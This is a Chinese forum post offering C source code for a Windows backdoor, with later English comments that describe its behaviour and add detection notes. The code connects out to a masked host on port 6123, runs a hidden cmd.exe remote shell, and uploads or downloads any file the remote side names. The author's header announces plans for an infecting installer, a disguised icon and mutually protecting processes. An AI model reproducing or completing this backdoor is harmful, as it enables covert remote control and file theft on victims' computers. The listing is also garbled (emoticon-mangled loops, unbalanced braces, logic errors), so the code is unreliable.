
后门程序源代码学习--------


帖子  niusan521 周三 三月 07, 2012 7:00 pm

//感染的部分还没有写,没时间。//至于感染,我会写个安装器来进行感染,然后伪装图标,利用互斥对象让进程互相保护
/*
Protocol of connection
Connect : CONN
Connected Success : SUCC
Reboot : REBT 暂时不可用
Upload : UPLD
Download : DNLD
Destroy : DTOY 暂时不可用
Help : HELP 暂时不可用
OK : START TO TRANSFER FILE
DoneTrans : Finish Transferring
*/
#include<WinSock.h>
#include<stdio.h>
#include<memory.h>
/* Mode selectors passed as the SET argument of LoadSOCKET. */
#define CONNECT 0
#define LISTEN 1
#define ACCEPT 2
/* Chinese-named macro aliases for the helper functions below; of these, only 加载WSA() is used in the code shown (in main). */
#define 加载WSA() LoadWSA()
#define 初始化套接字(地址的指针,设置,链接阵列,监听中的套接字) LoadSOCKET(地址的指针,设置,链接阵列,监听中的套接字)
#define 发送(套接字,缓冲区,数据长度) WSASend(套接字,缓冲区,数据长度)
#define 接受(套接字,数据长度) WSARecv(套接字,数据长度)
//the three mode selectors are defined a second time here with identical values
#define CONNECT 0
#define LISTEN 1
#define ACCEPT 2
#define INVALID_SETTING -50 //invalid argument (LoadSOCKET returns the literal -50 rather than this name)
//MAXIMUM is the receive size WSARecv falls back to; MINIMUM is not referenced in the code shown
#define MAXIMUM 65535
#define MINIMUM 1
//indices of the read end and the write end inside each pipe handle pair
#define READ 0
#define WRITE 1
#pragma comment(lib,"ws2_32.lib")
//socket for the outbound connection opened in main
SOCKET sock;
//two anonymous pipe pairs created in main; only hReadWrite1 is referenced after creation in the code shown
HANDLE hReadWrite1[2];
HANDLE hReadWrite2[2];
//startup settings for the child cmd.exe: main sets a hidden window and redirected standard handles
STARTUPINFO SI;
//attributes used for the pipes; main sets bInheritHandle so the handles are inheritable
SECURITY_ATTRIBUTES sa;
//remote endpoint that main fills in from the DNS lookup and port 6123
struct sockaddr_in saddr;
struct hostent *host;
//byte count reported by PeekNamedPipe in main's relay loop
long Bytes;
//not referenced in the code shown; UploadFile and DownloadFile declare their own local FILE *fp
FILE fp;
/*
 * Initialise Winsock, requesting version 2.2 (0x0202).
 * Returns 0 on success; on failure returns whatever WSAGetLastError() reports.
 */
int LoadWSA()//load the Winsock library
{
WSADATA wd;
if(WSAStartup(0x0202,&wd)!=0)//on failure, return the WSA error code
{
return(WSAGetLastError());
}
return 0;//otherwise return 0
}
/*
 * Socket helper with three intended modes selected by SET: CONNECT (0), LISTEN (1) and ACCEPT (2).
 * saddr: peer address; array: backlog handed to listen(); ListenSocket: socket handed to accept().
 * main calls it once, with CONNECT, to open the outbound TCP connection.
 * Visible return values are NULL on the error/default paths and -50 for a NULL saddr.
 * NOTE(review): as posted the braces do not balance (the switch is closed before "case 2" and one
 * closing brace is left over at the end), so this listing does not compile; the description here is
 * read from the text, not from a build.
 */
SOCKET LoadSOCKET(struct sockaddr_in *saddr,int SET,int array,SOCKET ListenSocket)
{
SOCKET sock;//local socket; shadows the file-level global of the same name
int size=sizeof(struct sockaddr);
if(SET<2)//original note: "if the setting passed in is ACCEPT"; the test SET<2 is true for CONNECT(0) and LISTEN(1)
{
sock=socket(AF_INET,SOCK_STREAM,0);
}
if(saddr=NULL)//original note: "an empty saddr was passed in"; written with a single '=', which the author corrects in the remark after the listing
{
return -50;
}
switch(SET)
{
case 0://CONNECT
{
if(connect(sock,(struct sockaddr*)&saddr,sizeof(struct sockaddr))<0)
{
return NULL;
}
}
case 1://LISTEN
if(listen(sock,array)<0)
{
return NULL;
}
}
case 2://ACCEPT
{
sock=accept(ListenSocket,(struct sockaddr*)saddr,&(size));
}
default://invalid argument passed in
{
return NULL;
}
}
}
/*
 * Thin wrapper over send().
 * sock: connected socket; buffer: data to send; Length: byte count, or a value below 1 to fall back to sizeof(buffer).
 * Returns the result of send().
 * The name matches the Winsock 2 API function WSASend, but the signature here is this file's own.
 */
int WSASend(SOCKET sock,char * buffer,int Length)
{
int size;
int ret;//never used
if(Length<1)
{
size=sizeof(buffer);//buffer is a char*, so this is the size of a pointer, not the length of the data
}
else
{
size=Length;
}
size=send(sock,buffer,size,0);
return size;
}
/*
 * Blocking receive: waits in select() until the socket is readable, calls recv() once and returns a
 * newly malloc'd copy of the data, which the caller must free.
 * sock: socket to read; Length: requested byte count, with 0 apparently meant to select MAXIMUM (65535).
 * NOTE(review): both tests contain a '=' inside a larger expression (Length=0, and sizeofP=(recv(...))>0),
 * so the receive size and the copy length are not what the variable names suggest. The returned buffer
 * is not NUL-terminated and its length is not reported to the caller.
 */
char * WSARecv(SOCKET sock,int Length)
{
FD_SET fd;
char *buffer=(char*)malloc(65535);//scratch receive buffer, freed before returning
char *ret;
int sizeofP;
int size;
if(Length=0)
{
size=MAXIMUM;
}
else
{
size=Length;
}
FD_ZERO(&fd);
FD_SET(sock,&fd);
//loop header as rendered by the forum; an emoticon name apparently replaced part of the original text
for(;Wink
{
if(select(sock+1,&fd,0,0,0)>0)//NULL timeout: blocks until the socket is readable
{
if(FD_ISSET(sock,&fd))
{
if(sizeofP=(recv(sock,buffer,size,0))>0)
{
ret=(char*)malloc(sizeofP);memcpy(ret,buffer,sizeofP);
free(buffer);
return ret;
}
}
}
//the set is cleared at the end of every pass and sock is not added back before the next select()
FD_ZERO(&fd);
}
}

/*
 * Handshake with the remote peer over the global sock: sends "CONN" and reads a reply, repeating
 * until the reply is accepted as "SUCC" (see the protocol table at the top of the listing).
 * Declared int but contains no return statement.
 * Detection note: the tokens are sent in cleartext, and sizeof("CONN") is 5, so each attempt puts
 * the bytes "CONN" plus a trailing NUL on the wire.
 */
int SENDCOMMAND()
{
int ret;//send result; stored but never examined
char *buf;
//loop header as rendered by the forum; an emoticon name apparently replaced part of the original text
for(;Wink
{
ret=WSASend(sock,"CONN",sizeof("CONN"));
buf=WSARecv(sock,4);
if(buf=="SUCC")//compares the pointer returned by WSARecv with the address of a literal, not the received bytes
{
free(buf);
break;
}
}
}
/*
 * Handles the UPLD command: receives a file from the remote peer and writes it to a path the peer chooses.
 * Sequence on the wire, as coded: the peer sends a path (up to 1000 bytes), this side answers "OK",
 * then data arrives in reads of up to 1024 bytes until the end-marker test on "DoneTrans" stops the loop.
 * Risk: the path is taken from the network with no validation, and "wb+" creates or truncates the file,
 * so the peer can overwrite any file this process is allowed to write.
 * NOTE(review): the results of recv() and fopen() are never checked, this code does not NUL-terminate
 * PATH, fp is never closed and neither heap buffer is freed; the function is declared int but returns nothing.
 */
int UploadFile(SOCKET sock)
{
char *buffer=(char*)malloc(1024);//receive buffer for file data
char *PATH=(char*)malloc(1000);//destination path supplied by the peer
FILE *fp;
long trueLen;
recv(sock,PATH,1000,0);
fp=fopen(PATH,"wb+");
send(sock,"OK",strlen("OK"),0);//acknowledge: the peer may start sending file data
while(1)
{
trueLen=recv(sock,buffer,1024,0);
//data is written only when every one of the first nine bytes differs from the same position in "DoneTrans";
//a match at any single position ends the transfer
if(buffer[0]!='D'&&buffer[1]!='o'&&buffer[2]!='n'&&buffer[3]!='e'&&buffer[4]!='T'&&buffer[5]!='r'&&buffer[6]!='a'&&buffer[7]!='n'&&buffer[8]!='s')
{
fwrite(buffer,1,trueLen,fp);
}
else
{
break;
}
}
}
/*
 * Handles the DNLD command: reads a local file named by the remote peer and sends its contents to the peer.
 * Sequence on the wire, as coded: the peer sends a path (up to 1000 bytes), this side answers "OK",
 * waits one second, streams the file in reads of up to 1024 bytes, then sends the 9-byte marker "DoneTrans".
 * Risk: the path is taken from the network with no validation, so the peer can request any file this
 * process is allowed to open; the contents leave the host in cleartext.
 * NOTE(review): the results of recv(), fopen() and send() are never checked, this code does not
 * NUL-terminate PATH, fp is never closed and neither heap buffer is freed; the function is declared int
 * but returns nothing.
 */
int DownloadFile(SOCKET sock)
{
char *buffer=(char*)malloc(1024);char *PATH=(char*)malloc(1000);
FILE *fp;
long trueLen;
recv(sock,PATH,1000,0);
fp=fopen(PATH,"rb+");//read/update mode on the peer-supplied path
send(sock,"OK",strlen("OK"),0);
Sleep(1000);//fixed one-second pause before the data starts
while(1)
{

if(!feof(fp))
{
trueLen=fread(buffer,1,1024,fp);
send(sock,buffer,trueLen,0);
}
else
{
send(sock,"DoneTrans",9,0);//end-of-transfer marker from the protocol table
break;
}
}
}
/*
 * Entry point. In order, the visible code:
 *  1. retries Winsock initialisation every 5 seconds until it succeeds;
 *  2. creates two anonymous pipes with inheritable handles and fills STARTUPINFO for a hidden
 *     window with redirected standard handles;
 *  3. resolves a host name (masked with asterisks in the post) in a retry loop that has no delay,
 *     and sets TCP port 6123;
 *  4. connects out through LoadSOCKET(CONNECT), runs the CONN/SUCC handshake, then starts cmd.exe;
 *  5. loops forever, relaying pipe output to the socket and socket input to UploadFile (UPLD),
 *     DownloadFile (DNLD) or the pipe.
 * Detection notes for defenders: a cmd.exe child started with a hidden window and redirected standard
 * handles, an outbound TCP connection to port 6123, cleartext command tokens (CONN, SUCC, UPLD, DNLD,
 * OK, DoneTrans), and back-to-back DNS lookups of a single name while resolution fails.
 * NOTE(review): the listing does not compile as posted (garbled loop headers, unbalanced braces in
 * LoadSOCKET) and no API result other than the three retry checks is examined.
 */
int main()
{
char *ip;//not used in the code shown
char *command;//not used in the code shown
char *buffer=(char*)malloc(4096);//shared relay buffer for pipe and socket data
//retry Winsock initialisation every 5 seconds until it succeeds
loop:if(加载WSA()!=0)
{
Sleep(5000);
goto loop;
}
//pipe handles are created inheritable; nLength is hard-coded to 12 rather than taken from sizeof(sa)
sa.lpSecurityDescriptor=0;
sa.bInheritHandle=1;
sa.nLength=12;
CreatePipe(&hReadWrite1[READ],&hReadWrite1[WRITE],&sa,0);
CreatePipe(&hReadWrite2[READ],&hReadWrite2[WRITE],&sa,0);
//child process settings: hidden window (SW_HIDE) and redirected standard handles
SI.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
SI.wShowWindow=SW_HIDE;
//all three standard handles come from hReadWrite1; hReadWrite2 is created above but not referenced again
SI.hStdInput=hReadWrite1[WRITE];
SI.hStdOutput=hReadWrite1[READ];
SI.hStdError=hReadWrite1[READ];
//DNS lookup of the remote host (name masked in the post); retried immediately on failure, with no back-off
lp:host=gethostbyname("************.net");
if(host==NULL)
{
goto lp;
}
memcpy(&saddr.sin_addr.S_un.S_addr,&host->h_addr_list[0],host->h_length);
saddr.sin_port=htons(6123);//fixed remote TCP port
saddr.sin_family=host->h_addrtype;
//outbound connection attempt, retried immediately while LoadSOCKET returns NULL
aak:sock=LoadSOCKET(&saddr,CONNECT,0,0);
if(sock==NULL)
{
goto aak;
}SENDCOMMAND();
//start the command interpreter with the STARTUPINFO prepared above; the result is not checked
CreateProcess(0,"cmd.exe",&sa,0,0,0,0,0,&SI,0);
//relay loop; loop header as rendered by the forum, where an emoticon name apparently replaced part of the text
for(;Wink
{
//check for pending pipe data without blocking
PeekNamedPipe(hReadWrite1[0],buffer,4096,(LPDWORD)&Bytes,0,0);
if(Bytes)
{
//forward pending pipe data to the remote peer
ReadFile(hReadWrite1[READ],buffer,Bytes,0,0);
WSASend(sock,buffer,Bytes);
}
else
{
//nothing pending on the pipe: read the next message from the peer (return value not checked)
recv(sock,buffer,4096,0);
//dispatch on the first four bytes: UPLD and DNLD start file transfers, anything else goes to the pipe
if(buffer[0]=='U'&&buffer[1]=='P'&&buffer[2]=='L'&&buffer[3]=='D')
{
UploadFile(sock);
}
else
{
if(buffer[0]=='D'&&buffer[1]=='N'&&buffer[2]=='L'&&buffer[3]=='D')
{
DownloadFile(sock);
}
else
{
//length comes from strlen(), although recv() does not NUL-terminate the buffer
WriteFile(
hReadWrite1[WRITE],
buffer,
strlen(buffer),
0,
0
);
}
}
}
}

}
更正一下:上面的判断应该是 saddr==NULL,这是我的坏习惯。以后最好写成 NULL==saddr,这样如果误写成 = 号,编译器就会报错,因为变量不可能赋给一个常量,以后也好查错。
